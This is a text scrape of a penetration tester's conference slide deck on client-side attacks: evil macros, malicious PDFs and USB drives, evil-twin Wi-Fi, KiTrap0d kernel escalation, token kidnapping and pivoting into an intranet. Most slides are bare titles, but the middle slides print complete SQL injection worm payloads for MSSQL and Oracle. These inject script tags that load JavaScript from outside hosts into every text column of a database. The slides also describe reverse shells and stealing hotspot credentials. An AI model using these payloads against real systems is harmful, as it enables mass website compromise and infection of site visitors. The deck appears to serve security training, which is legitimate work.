Upload
prathan-phongthiproek
View
442
Download
4
Tags:
Embed Size (px)
DESCRIPTION
Client Side Exploitation Techniques for attack client-side then access into intranet for fun, Additional latest Microsoft vulnerability that never patch for year (MS was Suck...)
Citation preview
Tactical Assassins : Client-Side OWNage
Prathan Phongthiproek ACIS Professional Center Senior Information Security Consultant
Instructor / Speaker Red Team : Penetration Tester (Team Leader) Security Consultant / Researcher CWH Underground Exploits and Vulnerabilities Disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
Who am I ?!
Let’s Talk !
Attack Layer 8: Client-Side OWNage MS Office (Evil Macro) Malicious Adobe PDF Malicious USB One-Click Attack Evil-Twin Attack !
Built-in Pen-Test Tactics Black Hat versus White Hat Using Black Hat styles to Compromise system
Operation CloudBurst
Client-Side OWNage The Way to Attack Layer 8!
MS Office (Evil Macro) ! MS Office is Evil !!
MS Office (Evil Macro) !
MS Office (Evil Macro) !
MS Office (Evil Macro) !
Malicious Adobe PDF !
Malicious Adobe PDF !
Malicious Adobe PDF !
Malicious Adobe PDF !
Malicious Adobe PDF !
Malicious PDF File
Malicious Adobe PDF !
Malicious Adobe PDF !
Malicious USB !
Autoplay NOT Autorun
Malicious USB !
Turn Off Autoplay -> It’s still vulnerable from evil usb
Malicious USB !
Malicious USB !
Malicious USB !
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
0xff
Malicious USB !
One-Click Attack !
One-Click Attack !
One-Click Attack !
SQL Injection Worms - MSSQL !
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
One-Click Attack !
SQL Injection Worms - MSSQL !
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C L A R E T a b l e _ C u r s o r C U R S O R F O R s e l e c t a . n a m e , b . n a m e f r o m s y s o b j e c t s a , s y s c o l u m n s b w h e r e a . i d = b . i d a n d a . x t y p e = ' u ' a n d ( b . x t y p e = 9 9 o r b . x t y p e = 3 5 o r b . x t y p e = 2 3 1 o r b . x t y p e = 1 6 7 ) O P E N T a b l e _ C u r s o r F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C W H I L E ( @ @ F E T C H _ S T A T U S = 0 ) B E G I N e x e c ( ' u p d a t e [ ' + @ T + ' ] s e t [ ' + @ C + ' ] = r t r i m ( c o n v e r t ( v a r c h a r , [ ' + @ C + ' ] ) ) + ' ' < s c r i p t s r c = h t t p : / / w w w . f e n g n i m a . c n / k . j s > < / s c r i p t > ' ' ' ) F E T C H N E X T F R O M T a b l e _ C u r s o r I N T O @ T , @ C E N D C L O S E T a b l e _ C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--
One-Click Attack !
SQL Injection Worms - Oracle !
http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
One-Click Attack !
One-Click Attack !
One-Click Attack !
One-Click Attack !
One-Click Attack !
Link to Malicious Website
Reverse Shell to Attackers
One-Click Attack !
Evil-Twin Attack !
Karma + Metasploit = Karmetasploit !!
Rouge Access Point (Evil Twin): Steal usernames, passwords and information from public wireless hotspots
Why we don’t steal something evil like credit card (Pay to Play) ??
Evil-Twin Attack !
Evil-Twin Attack !
Evil-Twin Attack !
Built-in Pen-Test Tactics !
Black Hat versus White Hat! Thinking Outside of the Box
Know one piece of information and have to expand from there
Compromise all system and Target Attack
All Methodologies was Integrate
Manual Foot printing, No noisy scan, Just Nmap and 0-Day Attack
Attack Layer 8 :Client-Side OWNage
Thinking Inside the box
Assigned Limited block of IP address
Unable to go beyond the scope of approved list, Only touch xyz hosts, Don’t touch abc host.
Follow Pen-Test Methodologies; OSSTMM, NIST, ISSAF
Download Exploit from Milw0rm, Exploit with Core Impact, CANVAS, Metasploit
Oops, I cannot hack user.
Pen-Tester Must “Thinking outside of the box”
Attack Layer 8 : More effective result
Pen-Test with Black Hat styles
Using Black Hat Mind Email Address Enumeration Social Networking (Maltego) Social Engineering (Adobe PDF, Evil Macro, One-Click
Attack, IE Aurora, etc) Information Gathering All subdomain
xyz.victim.com, abc.victim.com, 123.victim.com Blind Test, Compromise all system and Target Attack
Using Black Hat styles to Compromise system
Using Black Hat styles to Compromise system
Operation CloudBurst!
MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)
Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)
Patch release MS10-015 on Feb 09 2010
0-day for 1 month. W00t ! W00t !
KiTra0d – Local Ring0 Kernel Exploit
Get The Hell Outta Here !!
KiTra0d – Local Ring0 Kernel Exploit
Token - Web Cookies
On Windows XP / 2003 – Windows Service run as SYSTEM account Compromise of a Service == Full System Compromise
On Windows Vista / 2008 - LocalService / NetworkService == System
Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)
Patch release MS09-012 on April 14 2009
0-day for 1 year. W00t ! W00t !!
Black hat Mind !! Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
Token Kidnapping – Elevate Privilege
Start Mission with Attack Layer 8 SPAM Mail / 1-Click Ownage Reverse Shell to Attacker
KiTrap0D – The Message From Slave to God 0-Day Ring0 xpl, All Windows OS
Maintain Access Pivot (Tunneling), Backdoor Position
Compromise All System and Domain Controller Impersonate Token, Pass-The-Hash Attack
Operation CloudBurst
Operation CloudBurst!
Internet
Reverse Shell connection to Attacker
KiTrap0d XPL Pivot Network – Route Add
Attack Network – Passthehash, impersonate Token
Intranet
If someone is still in the room.. Q&A!
THANK YOU !